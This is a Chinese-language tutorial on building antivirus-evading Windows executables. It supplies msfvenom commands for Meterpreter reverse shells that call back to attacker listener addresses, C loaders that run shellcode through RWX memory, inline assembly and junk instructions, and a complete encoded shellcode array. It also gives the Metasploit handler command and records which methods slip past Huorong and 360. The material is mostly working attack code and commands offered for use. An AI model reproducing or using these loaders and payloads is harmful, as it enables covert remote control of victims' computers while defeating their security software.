1. 执行指针

1.1 生成C源代码

  1. msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=192.168.235.130 lport=4444 -f c

image.png

1.2 生成c程序

  1. unsigned char buf[] = 
  2. "shellcode is here";
  3. main()
  4. {
  5.     ( (void(*)(void))&buf)();
  6. }


生成后的代码如下:
image.png

1.3 编译生成exe文件

image.png

1.4 MSF监听和上线

  1. handler -H 192.168.235.130 -P 4444 -p windows/meterpreter/reverse_tcp

image.png

1.5 免杀效果

  1. 火绒静态和动态都能查杀
  2. 360静态和动态都免杀

image.png

2. reverse_https


2.1 生成.c源代码

  1. msfvenom -p  windows/meterpreter/reverse_https  lhost=192.168.235.130 lport=3333  -f c

image.png

2.2 编译生成exe文件

image.png

2.3 免杀效果

  1. 火绒静态和动态都能查杀
  2. 360静态免杀,动态被杀

3. 申请动态内存加载shellcode


3.1 生成.c源代码

  1. msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=192.168.235.130 lport=4444 -f c

image.png

3.2 代码

把shellcode替换里面的具体内容

  1. #include <Windows.h>
  2. #include <stdio.h>
  3. #include <string.h>
  4. #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")
  5. //windows控制台程序不出黑窗口
  6. unsigned char buf[] =
  7. "shellcode";
  8. main()
  9. {
  10.     char *Memory;
  11.     Memory=VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE,
  12.     PAGE_EXECUTE_READWRITE);
  13.     memcpy(Memory, buf, sizeof(buf));
  14.     ((void(*)())Memory)();
  15. }

3.3 编译生成exe文件

image.png

3.4 免杀效果

  1. 火绒静态和动态都能查杀
  2. 360静态动态都免杀

4. 嵌入式汇编


4.1 生成.c源代码

  1. msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=192.168.235.130 lport=4444 -f c

image.png

4.2 代码

  1. #include <windows.h>
  2. #include <stdio.h>
  3. #pragma comment(linker, "/section:.data,RWE")
  4. unsigned char shellcode[] = "shellcode";
  6. void main()
  7. {
  8.     __asm
  9.   {
  10.     mov eax, offset shellcode
  11.     jmp eax
  12.   }
  13. }


4.3 编译生成exe文件

image.png

4.4 免杀效果

  1. 火绒静态和动态都能查杀
  2. 360静态和动态都免杀

5.强制类型转换


5.1 生成.c源代码

  1. msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=192.168.235.130 lport=4444 -f c

image.png

5.2 编译代码生成exe文件

  1. #include <windows.h>
  2. #include <stdio.h>
  3. unsigned char buf[] =
  4. "\xda\xc5\xd9\x74\x24\xf4\xbb\x1e\x85\xca\xa8\x5f\x31\xc9\xb1"
  5. "\x74\x31\x5f\x19\x03\x5f\x19\x83\xef\xfc\xfc\x70\x13\x66\xd9"
  6. "\x0f\x80\x83\x61\x7f\x2e\xef\x55\xdd\x84\x39\xe4\xb3\x59\x7c"
  7. "\x02\x7d\x1b\x69\x09\x38\xb5\x77\x68\xfd\xed\x0c\x29\x31\x3b"
  8. "\x53\x77\xf4\xd1\xcf\xe1\xe0\xc7\xc2\x1c\xda\xa6\xae\x12\x43"
  9. "\xab\x87\x20\x32\xf4\x88\x01\x75\xf8\x35\x5e\x88\x22\xf3\x23"
  10. "\xa0\x1f\x3b\x27\xda\xc9\x9e\xf1\x55\xf3\x9c\xb1\xe9\xd2\x3c"
  11. "\xee\xea\x1f\x8d\xbe\x0f\x14\x5a\xdf\x4f\x7f\x13\x5c\x8d\x57"
  12. "\x27\x5f\xba\x79\x60\x2a\x42\x7b\xe3\x6e\x3f\xb7\xc3\xbf\x33"
  13. "\x04\xe3\xa5\x55\x79\x12\xd4\x63\xa4\x84\x47\x9c\x4f\x9b\xf3"
  14. "\xfb\xdc\xe4\x7c\x8f\x8f\x42\xbe\xf8\x27\xee\x98\x5d\x9a\xc8"
  15. "\x37\x08\xe1\x6a\xb9\x1a\xc2\xf3\x01\xa3\x97\x15\x3c\xf6\xdb"
  16. "\xef\xca\x31\x2c\xa5\xae\x34\x30\x3b\xf8\x92\xc5\x0e\xb9\x1f"
  17. "\x88\xb9\x1b\x9e\x85\x28\x20\xd3\xe4\x15\xfa\xbe\x3b\x9c\x6f"
  18. "\xf1\xca\x28\xf5\x0e\x5e\x8e\x3d\x8e\x88\x95\xcd\x1b\xfd\xb1"
  19. "\x4b\x15\xa2\x7d\xce\x21\x27\x25\x74\x9d\x48\x0b\xc7\x5b\x1b"
  20. "\x08\x2f\x71\x11\x13\x92\x9c\x3f\x65\xdf\x38\xec\x61\xa0\xf5"
  21. "\x3f\xde\x6d\xa7\x91\x27\xce\xc6\xd4\xf1\xa3\xf1\x91\x72\x05"
  22. "\x60\x9c\x9a\xc4\x41\x1b\x7a\xa6\x52\xd5\x50\x86\xaf\x22\x62"
  23. "\xfa\x35\x3c\xca\x37\xab\xca\xdf\xcf\x59\xf4\x54\xd7\xf3\xc7"
  24. "\x39\xe8\xca\x08\x52\xaf\x45\x31\xf0\xa9\x5e\xa9\xd5\x8f\x7d"
  25. "\xa9\x06\x75\x3e\xf5\x34\xb2\x34\xa6\x57\xec\x3a\x81\x90\x38"
  26. "\xfb\x65\x81\x25\xb6\xfc\xf4\x6e\x48\xed\x50\x72\x7f\xd3\xa9"
  27. "\xbf\xb1\x5f\x14\xbd\xcd\xe6\xde\xc4\x84\x19\x90\xf9\x35\x23"
  28. "\xe2\x35\xa4\x0d\xbc\xab\x93\xb2\x7d\xc9\x79\x91\xe8\xd6\xeb"
  29. "\x01\x4e\x76\xdb\x0f\x52\x8f\xc9\x3d\xd5\xf3\x84\x15\xbb\x13"
  30. "\x7e\x0e\xc2\x55\x9e\x0d\x19\x7c\x5e\x9d\x0c\x40\x21\xa0\x36"
  31. "\x10\x71\x66\x38\x0b\x16\x8e\x08\xed\x79\xc8\x7e\x79\x30\xc3"
  32. "\xf2\xd1\x0c\xd6\x77\xdd\x58\x7c\xef\x67\xaa\x93\xdf\xd3\xa2"
  33. "\xf2\xac\xa3\xb4\xe6\xed\x9b\x34\xbc\x3b\x81\xe7\x6f\xad\xd5"
  34. "\x10\x1b\x9d\x74\x87\x81\xb4\x34\xe9\x4c\x63\x25\xc7\x1f\x68"
  35. "\x60\x6a\xbd\xca\x84\x35\xa9\x45\x87\xf5\xf0\x60\x91\x88\xb2"
  36. "\x59\xa1\x67\x1d\x42\xd9\xba\x05\x95";
  38. void main()
  39. {
  40.     ((void(WINAPI*)(void))&buf)();
  41. }


5.3 上线

image.png

5.4 免杀效果

  1. 火绒静态和动态都能查杀
  2. 360静态和动态都能免杀


6.汇编花指令


6.1 生成.c源代码

  1. msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=192.168.235.130 lport=4444 -f c

image.png

6.2 代码

  1. #include <windows.h>
  2. #include <stdio.h>
  3. #pragma comment(linker, "/section:.data,RWE")
  4. unsigned char shellcode[] =
  5. "\xda\xc5\xd9\x74\x24\xf4\xbb\x1e\x85\xca\xa8\x5f\x31\xc9\xb1"
  6. "\x74\x31\x5f\x19\x03\x5f\x19\x83\xef\xfc\xfc\x70\x13\x66\xd9"
  7. "\x0f\x80\x83\x61\x7f\x2e\xef\x55\xdd\x84\x39\xe4\xb3\x59\x7c"
  8. "\x02\x7d\x1b\x69\x09\x38\xb5\x77\x68\xfd\xed\x0c\x29\x31\x3b"
  9. "\x53\x77\xf4\xd1\xcf\xe1\xe0\xc7\xc2\x1c\xda\xa6\xae\x12\x43"
  10. "\xab\x87\x20\x32\xf4\x88\x01\x75\xf8\x35\x5e\x88\x22\xf3\x23"
  11. "\xa0\x1f\x3b\x27\xda\xc9\x9e\xf1\x55\xf3\x9c\xb1\xe9\xd2\x3c"
  12. "\xee\xea\x1f\x8d\xbe\x0f\x14\x5a\xdf\x4f\x7f\x13\x5c\x8d\x57"
  13. "\x27\x5f\xba\x79\x60\x2a\x42\x7b\xe3\x6e\x3f\xb7\xc3\xbf\x33"
  14. "\x04\xe3\xa5\x55\x79\x12\xd4\x63\xa4\x84\x47\x9c\x4f\x9b\xf3"
  15. "\xfb\xdc\xe4\x7c\x8f\x8f\x42\xbe\xf8\x27\xee\x98\x5d\x9a\xc8"
  16. "\x37\x08\xe1\x6a\xb9\x1a\xc2\xf3\x01\xa3\x97\x15\x3c\xf6\xdb"
  17. "\xef\xca\x31\x2c\xa5\xae\x34\x30\x3b\xf8\x92\xc5\x0e\xb9\x1f"
  18. "\x88\xb9\x1b\x9e\x85\x28\x20\xd3\xe4\x15\xfa\xbe\x3b\x9c\x6f"
  19. "\xf1\xca\x28\xf5\x0e\x5e\x8e\x3d\x8e\x88\x95\xcd\x1b\xfd\xb1"
  20. "\x4b\x15\xa2\x7d\xce\x21\x27\x25\x74\x9d\x48\x0b\xc7\x5b\x1b"
  21. "\x08\x2f\x71\x11\x13\x92\x9c\x3f\x65\xdf\x38\xec\x61\xa0\xf5"
  22. "\x3f\xde\x6d\xa7\x91\x27\xce\xc6\xd4\xf1\xa3\xf1\x91\x72\x05"
  23. "\x60\x9c\x9a\xc4\x41\x1b\x7a\xa6\x52\xd5\x50\x86\xaf\x22\x62"
  24. "\xfa\x35\x3c\xca\x37\xab\xca\xdf\xcf\x59\xf4\x54\xd7\xf3\xc7"
  25. "\x39\xe8\xca\x08\x52\xaf\x45\x31\xf0\xa9\x5e\xa9\xd5\x8f\x7d"
  26. "\xa9\x06\x75\x3e\xf5\x34\xb2\x34\xa6\x57\xec\x3a\x81\x90\x38"
  27. "\xfb\x65\x81\x25\xb6\xfc\xf4\x6e\x48\xed\x50\x72\x7f\xd3\xa9"
  28. "\xbf\xb1\x5f\x14\xbd\xcd\xe6\xde\xc4\x84\x19\x90\xf9\x35\x23"
  29. "\xe2\x35\xa4\x0d\xbc\xab\x93\xb2\x7d\xc9\x79\x91\xe8\xd6\xeb"
  30. "\x01\x4e\x76\xdb\x0f\x52\x8f\xc9\x3d\xd5\xf3\x84\x15\xbb\x13"
  31. "\x7e\x0e\xc2\x55\x9e\x0d\x19\x7c\x5e\x9d\x0c\x40\x21\xa0\x36"
  32. "\x10\x71\x66\x38\x0b\x16\x8e\x08\xed\x79\xc8\x7e\x79\x30\xc3"
  33. "\xf2\xd1\x0c\xd6\x77\xdd\x58\x7c\xef\x67\xaa\x93\xdf\xd3\xa2"
  34. "\xf2\xac\xa3\xb4\xe6\xed\x9b\x34\xbc\x3b\x81\xe7\x6f\xad\xd5"
  35. "\x10\x1b\x9d\x74\x87\x81\xb4\x34\xe9\x4c\x63\x25\xc7\x1f\x68"
  36. "\x60\x6a\xbd\xca\x84\x35\xa9\x45\x87\xf5\xf0\x60\x91\x88\xb2"
  37. "\x59\xa1\x67\x1d\x42\xd9\xba\x05\x95";
  41. void main()
  42. {
  43.     __asm
  44.     {
  45.         mov eax, offset shellcode
  46.         _emit 0xFF
  47.         _emit 0xE0
  48.     }
  49. }


6.3 编译生成exe文件

image.png

6.4 免杀效果

  1. 火绒静态和动态都能查杀o
  2. 360静态和动态都能免杀

7. XOR加密(未实践)

8. Base64加密(未实践)

9. Python变形shellcode+汇编(未实践)

10. Python+xor处理(未实践)

11. 使用golang加载shellcode

12. 使用shellcode_launcher加载


12.1 下载链接

  1. https://github.com/clinicallyinane/shellcode_launcher/

12.2 生成raw文件

  1. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.5.132 lport=7777 -f raw -o shellcode.raw

image.png

12.3 上线


使用下面命令可以上线

  1. shellcode_launcher.exe -i shellcode.raw

image.png

12.4 免杀效果

  1. 360和火绒对shellcode.raw静态和动态都免杀;但是加载器shellcode_launcher.exe不免杀。